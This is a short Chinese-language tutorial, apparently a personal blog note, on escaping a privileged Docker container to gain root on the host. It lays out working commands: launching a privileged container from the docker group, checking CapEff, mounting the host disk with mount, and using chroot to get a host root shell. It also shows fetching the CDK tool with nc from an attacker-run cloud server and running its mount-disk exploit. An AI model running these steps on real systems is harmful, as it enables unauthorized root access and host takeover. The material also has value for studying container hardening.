特权模式Privileged

假如获取到了一个普通用户权限，发现位于dockers组，可以直接

docker run -itd --net=host --privileged ubuntu:18.04 /bin/bash

就创建好了一个特权容器，之后直接利用这个容器就能提权

如果是直接进到容器里，

在容器内部执行下面的命令，从而判断容器是不是特权模式，如果是以特权模式启动的话，CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff

cat /proc/self/status | grep CapEff

然后查看挂载磁盘设备

fdisk -l

再

mkdir /test && mount /dev/sda1 /test

/test 是创建然后挂载过来的目录，随便写一个好记的都可以

cd /test

chroot ./ bash

就可以直接逃逸到宿主机并且是root

如图(图中设置的挂载位置不同)

直接把root的shell弹出来了

cdk工具的方法

起docker，Ubuntu18.04

(云服务器开监听忘了截图了)

nc -lvp 999 < cdk

提前用sftp把cdk传到云服务器上

然后

cdk拉过来以后先设置权限，可执行

记得./ ，我第一次就忘了（

信息收集的结果太长了，截图截不下了

出了不少大红↓

重点在这呢，检测到特权容器

之后执行

./cdk run mount-disk

会给一个临时目录，是挂载的目的地，cd过去

看到已经挂载了宿主机的目录